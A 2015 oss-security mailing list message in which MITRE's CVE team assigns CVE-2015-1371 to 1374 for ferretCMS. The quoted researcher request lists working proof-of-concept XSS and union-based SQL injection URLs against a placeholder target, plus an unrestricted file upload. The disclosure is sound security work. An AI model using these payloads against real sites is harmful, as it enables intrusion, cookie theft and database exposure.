Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.64.1501271034400.11165@beijing.mitre.org>
Date: Tue, 27 Jan 2015 10:37:48 -0500 (EST)
From: cve-assign@...re.org
To: Steffen Rösemann <steffen.roesemann1986@...il.com>
cc: oss-security@...ts.openwall.com, cve-assign@...re.org
Subject: Re: CVE-Request -- ferretCMS v.1.0.4-alpha -- Multiple
 reflecting/stored XSS- and SQLi-vulnerabilities, unrestricted file upload


> I found multiple reflecting/stored XSS- and SQLi-vulnerabilities as well as
> an unrestricted file upload in the CMS ferretCMS v.1.0.4 which is currently
> in the alpha development stage.
>
> ============
> Reflecting XSS
> ============
>
> http://
> {TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
>
> ============
> Stored XSS
> ============
>
> 1.
> via login-form of the administrative backend, input field for username:
>
> http://{TARGET}/admin.php
>
> executed here in the logevent functionality in the backend:
>
> http://{TARGET}/admin.php?type=log&action=read
>
> 2.
>
> via the new blog-post form, input field for pagetitle:
>
> http://{TARGET}/admin.php?type=page&action=insert&p=
>
> executed, for example, here:
>
> http://{TARGET}/admin.php?type=page&action=read


Use CVE-2015-1373.


> ============
> SQLi
> ============
>
> http://
> {TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
>
> http://
> {TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+
>
> http://
> {TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+
>
> http://
> {TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+
>
> http://
> {TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+
>
> http://
> {TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
>
> http://
> {TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+

Use CVE-2015-1372.

> ==================
> Unrestricted file upload
> ==================
>
> An administrator has the opportunity to upload arbitrary files via a form
> located here on a common ferretCMS installation:
>
> http://{TARGET}/admin.php?type=uploader&action=upload
>
> As these files aren't renamed and stored in the following location, any
> unauthenticated user is able to read/execute those files, too:
>
> http://{TARGET}/custom/uploads/{NAME_OF_THE_FILE}

Use CVE-2015-1371.


Use CVE-2015-1374 for the underlying CSRF that makes the XSS, SQLi, and 
file-upload attacks accessible to non-administrators.

> Could you please assign a CVE-ID / CVE-IDs for these issues.
>
> Thank you very much!
>
> Greetings.
>
> Steffen Rösemann
>
> References:
>
> [1] https://github.com/JRogaishio/ferretCMS
> [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html
> [3] https://github.com/JRogaishio/ferretCMS/issues/63
> [4] https://github.com/sroesemann/ferretCMS
> [5] http://seclists.org/fulldisclosure/2015/Jan/98
> [6]
> http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-10.html
>

---

CVE assignment team, MITRE CVE Numbering Authority M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.